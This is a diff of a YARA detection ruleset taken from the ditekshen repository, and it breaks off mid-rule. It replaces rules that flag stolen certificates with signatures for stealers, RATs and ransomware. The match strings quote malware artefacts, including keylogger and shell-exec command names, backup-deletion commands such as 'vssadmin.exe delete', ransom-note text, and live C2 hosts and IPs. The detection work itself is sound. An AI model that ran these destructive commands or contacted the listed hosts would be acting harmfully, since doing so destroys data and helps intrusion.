-		modified = "2024-10-04"
+		id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5379-L5391"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2252-L2269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "da0921c1e416b3734272dfa619f88c8cd32e9816cdcbeeb81d9e2b2e8a95af4c"
-		logic_hash = "9d1a20f3dfa6c31ed557e531f7a57c64032e518c033993234849882ef769fcbd"
+		logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "07a09d3d3c05918519d6f357fe7eed5e1d529f22"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.StormKitty"
+
+	strings:
+		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
+		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
+		$x3 = "StormKitty" fullword ascii
+		$s1 = "GetBSSID" fullword ascii
+		$s2 = "GetAntivirus" fullword ascii
+		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
+		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
+		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
+		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avast Antivirus SEC" and pe.signatures [ i ] . serial == "6b:67:39:e5:5f:3f:25:b1:47:c4:a6:76:7d:e4:1f:57" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B97F66Bb221772Dc07Ef1D4Bed8F6085 : FILE
+rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects trojan loader"
 		author = "ditekSHen"
-		id = "c0797751-d03c-59c7-a02a-27e6f466bd96"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5393-L5404"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2271-L2281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e68f6ebbeadc9381c2888abf77e040f27648a40d770524830f8a49fe2d11534f"
+		logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fb4efb3bfcef8e9a667c8657f2e3c8fb7436666e"
-		importance = 20
+
+	strings:
+		$s1 = "DisableTrivet.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and all of ( $s* ) and ( pe.exports ( "Ordinal" ) or pe.exports ( "Chechako" ) or pe.exports ( "Originator" ) or pe.exports ( "Repressions" ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Cc95D6Ebf18A3711E196Aea210465A19 : FILE
+rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RevCode/WebMonitor RAT"
 		author = "ditekSHen"
-		id = "bd6957ac-d5e0-5e77-87b3-a62c442f7f72"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4acf6742-7f5c-5126-89cc-b39b1acd922e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5406-L5417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2283-L2332"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "640ba6d64ad7e0791ef29d3ee9387e0944826f22f01a6a01486f6b3ac4138826"
+		logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "319f0e03f0f230629258c7ea05e7d56ead830ce9"
-		importance = 20
+		snort2_sid = "920070"
+		snort3_sid = "920070"
+		clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT"
+
+	strings:
+		$x1 = "rev-novm.dat" fullword wide
+		$x2 = "WebMonitor-" fullword wide
+		$x3 = "WebMonitor Client" fullword wide
+		$x4 = "Launch WebMonitor" fullword wide
+		$s1 = "KEYLOG_DEL" fullword ascii
+		$s2 = "KEYLOG_STREAM_START" fullword ascii
+		$s3 = "send_keylog_del" fullword ascii
+		$s4 = "send_keylog_stream_" ascii
+		$s5 = "send_shell_exec" fullword ascii
+		$s6 = "send_file_download_exec" fullword ascii
+		$s7 = "send_pdg_exec" fullword ascii
+		$s8 = "send_app_cmd_upd" fullword ascii
+		$s9 = "send_webcamstream_start" fullword ascii
+		$s10 = "send_screenstream_start" fullword ascii
+		$s11 = "send_clipboard_get" fullword ascii
+		$s12 = "send_pdg_rev_proxy_stop" fullword ascii
+		$s13 = "send_shell_stop" fullword ascii
+		$s14 = "send_wnd_cmd" fullword ascii
+		$s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii
+		$s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii
+		$s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii
+		$s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii
+		$s19 = "PLUGIN_PROCESS: Plugin" ascii
+		$s20 = "PLUGIN_EXEC: Plugin" ascii
+		$s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii
+		$cnc1 = "?task_id=" fullword ascii
+		$cnc2 = "&operation=" fullword ascii
+		$cnc3 = "&filesize=" fullword ascii
+		$cnc4 = "pos=" fullword ascii
+		$cnc5 = "&mode=" fullword ascii
+		$cnc6 = "&cmp=1" fullword ascii
+		$cnc7 = "&cmp=0" fullword ascii
+		$cnc8 = "&enc=1" fullword ascii
+		$cnc9 = "&enc=0" fullword ascii
+		$cnc10 = "&user=" fullword ascii
+		$cnc11 = "&uid=" fullword ascii
+		$cnc12 = "&key=" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GEN Sistemi, d.o.o." and pe.signatures [ i ] . serial == "00:cc:95:d6:eb:f1:8a:37:11:e1:96:ae:a2:10:46:5a:19" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $cnc* ) or 8 of ( $s* ) or ( 1 of ( $x* ) and 6 of ( $s* ) ) or ( 6 of ( $cnc* ) and 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dde89C647Dc2138244228040E324Dc77 : FILE
+rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects first stage PowerPool backdoor"
 		author = "ditekSHen"
-		id = "5008d334-964a-516b-895e-761ae94e5bd4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5419-L5430"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2334-L2361"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6c11a277f855ad8a4b235e1461ad024c4490d04530b91ecb47c8fcf8dee1239"
+		logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d9aaa1bc7d6fc5a76295dd1cf692fe4a1283f04"
-		importance = 20
+		snort2_sid = "920088"
+		snort3_sid = "920086"
+		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1"
+
+	strings:
+		$s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide
+		$s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide
+		$s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide
+		$s4 = "MyDemonMutex%d" fullword wide
+		$s5 = "MyScreen.jpg" fullword wide
+		$s6 = "proxy.log" fullword wide
+		$s7 = "myjt.exe" fullword wide
+		$s8 = "/?id=%s&info=%s" fullword wide
+		$s9 = "auto.cfg" fullword ascii
+		$s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide
+		$s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide
+		$s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii
+		$c1 = "run.afishaonline.eu" fullword wide
+		$c2 = "home.Sports-Collectors.com" fullword wide
+		$c3 = "about.Sports-Collectors.com" fullword
+		$c4 = "179.43.158.15" fullword wide
+		$c5 = "185.227.82.35" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "dd:e8:9c:64:7d:c2:13:82:44:22:80:40:e3:24:dc:77" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $c* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : FILE
+rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects second stage PowerPool backdoor"
 		author = "ditekSHen"
-		id = "8f7d0337-7840-5c6e-b562-dbaef1a7c022"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1a059900-3292-5419-a143-caea3e710191"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5432-L5443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2363-L2395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26690cb1ef7eb9b7009376b4c2a30505f01184f4462478f65379372e84e02bc8"
+		logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "4bc67aca336287ff574978ef3bf67c688f6449f2"
-		importance = 20
+		snort2_sid = "920089-920091"
+		snort3_sid = "920087-920089"
+		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2"
+
+	strings:
+		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
+		$s2 = "LookupAccountSid Error %u" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; )" fullword ascii
+		$s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
+		$s8 = "in Json::Value::find" fullword ascii
+		$s9 = "in Json::Value::resolveReference" fullword ascii
+		$s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii
+		$s11 = ".?AVLogicError@Json@@" fullword ascii
+		$s12 = ".?AVRuntimeError@Json@@" fullword ascii
+		$s13 = "http:\\\\82.221.101.157:80" ascii
+		$s14 = "http://172.223.112.130:80" ascii
+		$s15 = "http://172.223.112.130:443" ascii
+		$s16 = "http://info.newsrental.net:80" ascii
+		$s17 = "%s|%I64d" ascii
+		$s18 = "open internet failed..." ascii
+		$s19 = "connect failed..." ascii
+		$s20 = "handle not opened..." ascii
+		$s21 = "corrupted regex pattern" fullword ascii
+		$s22 = "add cookie failed..." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" )
+		uint16( 0 ) == 0x5a4d and 14 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4E7545C9Fc5938F5198Ab9F1749Ca31C : FILE
+rule DITEKSHEN_MALWARE_Win_Egregor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Egregor ransomware variants"
 		author = "ditekSHen"
-		id = "af27fbf7-f4e2-59e9-8b2b-b353704ce9d6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5445-L5456"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2397-L2434"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b7bc07622ad3f7ec77f4bb0d51350c82734af4b73a26ecd21955e55e99bb515"
+		logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7a49677c535a13d0a9b6deb539d084ff431a5b54"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Egregor"
+
+	strings:
+		$s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$p1 = "--deinstall" fullword wide
+		$p2 = "--del" fullword wide
+		$p3 = "--exit" fullword wide
+		$p4 = "--kill" fullword wide
+		$p5 = "--loud" fullword wide
+		$p6 = "--nooperation" fullword wide
+		$p7 = "--nop" fullword wide
+		$p8 = "--skip" fullword wide
+		$p9 = "--useless" fullword wide
+		$p10 = "--yourmommy" fullword wide
+		$p11 = "-passegregor" ascii wide
+		$p12 = "-peguard" ascii wide
+		$p13 = "--nomimikatz" ascii wide
+		$p14 = "--multiproc" ascii wide
+		$p15 = "--killrdp" ascii wide
+		$p16 = "--nonet" ascii wide
+		$p17 = "--norename" ascii wide
+		$p18 = "--greetings" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" )
+		( uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( all of ( $s* ) and 1 of ( $p* ) ) or ( 2 of them and filesize < 1000KB and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".00cfg" ) ) ) ) ) or 8 of ( $p* )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_040F11F124A73Bdecc41259845A8A773 : FILE
+rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables dropping RedLine infostealer"
 		author = "ditekSHen"
-		id = "0502773a-356e-5eae-9c37-e1ef89de3547"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "364ba540-60a5-5e1b-bb21-505a442eabb6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5458-L5469"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2461-L2484"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70edbe8be481ccb7b5c6a6485c2ac249ec5120a4cde18d551954cfeaae121f27"
+		logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6f332f7e78cac4a6c35209fde248ef317f7a23e8"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE"
+
+	strings:
+		$s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide
+		$s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide
+		$s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide
+		$s4 = "ClearEventLogW" fullword ascii
+		$s5 = "ProductionVersion" fullword wide
+		$s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide
+		$s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TrustPort" and pe.signatures [ i ] . serial == "04:0f:11:f1:24:a7:3b:de:cc:41:25:98:45:a8:a7:73" )
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "_fgeek@8" ) and 2 of them ) or ( 2 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".rig" ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1B1E87E90519D7273C0033Bf489B798F : FILE
+rule DITEKSHEN_MALWARE_Win_Nibiru : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nibiru ransomware"
 		author = "ditekSHen"
-		id = "b154ae08-108c-5980-a611-5e086877af2a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5471-L5483"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2486-L2504"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "84cef0aed269e6213bfa213d95a3db625bcdde130f33bf4227436985e4473252"
-		logic_hash = "b47f80ecc895e73d69c60a5e88d6a6c95fcb9bddb30f14a1421b68aabc2290c9"
+		logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef09824554f85603c9ffb1cecbfe06ae489a9583"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Nibiru"
+
+	strings:
+		$s1 = ".encrypt" fullword wide
+		$s2 = "crypted" fullword wide
+		$s3 = ".Nibiru" fullword wide
+		$s4 = "Encryption Complete" fullword wide
+		$s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii
+		$s6 = "EncryptOrDecryptFile" fullword ascii
+		$s7 = "get_hacker" ascii
+		$s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide
+		$s9 = "Once You pay,you get the KEY to decrypt files" ascii
+		$pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBIS, OOO" and pe.signatures [ i ] . serial == "1b:1e:87:e9:05:19:d7:27:3c:00:33:bf:48:9b:79:8f" )
+		uint16( 0 ) == 0x5a4d and ( 7 of them or ( $pdb and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D9E834182Dec62C654E775E809Ac1D1B : FILE
+rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "ce1640b7-6631-5e8f-a2df-0716b2f86b99"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects MedusaLocker ransomware"
+		author = "ditekshen"
+		id = "06b7645f-228d-5ec1-9b82-88caee447a5c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5485-L5497"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2506-L2537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "645dbb6df97018fafb4285dc18ea374c721c86349cb75494c7d63d6a6afc27e6"
-		logic_hash = "3e7ca9aec19f118c7a143826838244f3f8d0a603a44980522f5227a9c3a82a88"
+		logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "5bb983693823dbefa292c86d93b92a49ec6f9b26"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker"
+
+	strings:
+		$x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii
+		$x2 = "SOFTWARE\\Medusa" wide
+		$x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii
+		$s1 = "Recovery_Instructions.mht" fullword wide
+		$s2 = "README_LOCK.TXT" fullword wide
+		$s3 = "C:\\Users\\Public\\Desktop" wide
+		$s4 = "[LOCKER] " wide
+		$s5 = "TmV3LUl0ZW0gJ2" ascii
+		$s6 = "<HEAD>=20" ascii
+		$s7 = "LIST OF ENCRYPTED FILES" ascii
+		$s8 = "KEY.FILE" ascii
+		$cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
+		$cmd2 = "vssadmin.exe delete" wide nocase
+		$cmd3 = "bcdedit.exe /set {default}" wide
+		$cmd4 = "wbadmin delete systemstatebackup" wide nocase
+		$mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
+		$mut2 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide
+		$mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide
+		$ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00
+                  74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00
+                  73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00
+                  65 00 72 00 73 00 65 00 6e }
+		$ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 4 of ( $s* ) or 1 of ( $mut* ) ) ) or 6 of ( $s* ) or ( 1 of ( $mut* ) and 2 of ( $cmd* ) ) or ( 1 of ( $ext* ) and 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ced87Bd70B092Cb93B182Fac32655F6 : FILE
+rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "5e716e70-0c78-5194-9134-0ee140221610"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects RansomEXX ransomware"
+		author = "ditekshen"
+		id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5499-L5511"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2539-L2555"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "083d5efb4da09432a206cb7fba5cef2c82dd6cc080015fe69c2b36e71bca6c89"
-		logic_hash = "3d4d84a60095e608fbd774f2b3a0f86e32dd9fe25801da06ee10188425a029e0"
+		logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "97b7602ed71480756cf6e4658a107f8278a48096"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.RansomEXX"
+
+	strings:
+		$id = "ransom.exx" ascii
+		$s1 = "!TXDOT_READ_ME!.txt" fullword wide
+		$s2 = "debug.txt" fullword wide
+		$s3 = ".txd0t" fullword wide
+		$s4 = "crypt_detect" fullword wide
+		$s5 = "powershell.exe" fullword wide
+		$s6 = "cipher.exe" fullword ascii wide
+		$s7 = "?ReflectiveLoader@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" )
+		uint16( 0 ) == 0x5a4d and ( ( $id and 3 of ( $s* ) ) or all of ( $* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Afd1491D52F89Ba41Fa6C0281Bb9716 : FILE
+rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "a0e5569f-7895-519b-9c1b-9cea3126391f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Quasar infostealer"
+		author = "ditekshen"
+		id = "d0d532fe-bd0a-560a-8570-f6038d694338"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5513-L5524"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2557-L2572"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "071895cc37527aa634410dc79bf1656068e4c2b9f61d24912160c5f847e154f9"
+		logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e4362228dd69c25c1d4ba528549fa00845a8dc24"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.QuasarStealer"
+
+	strings:
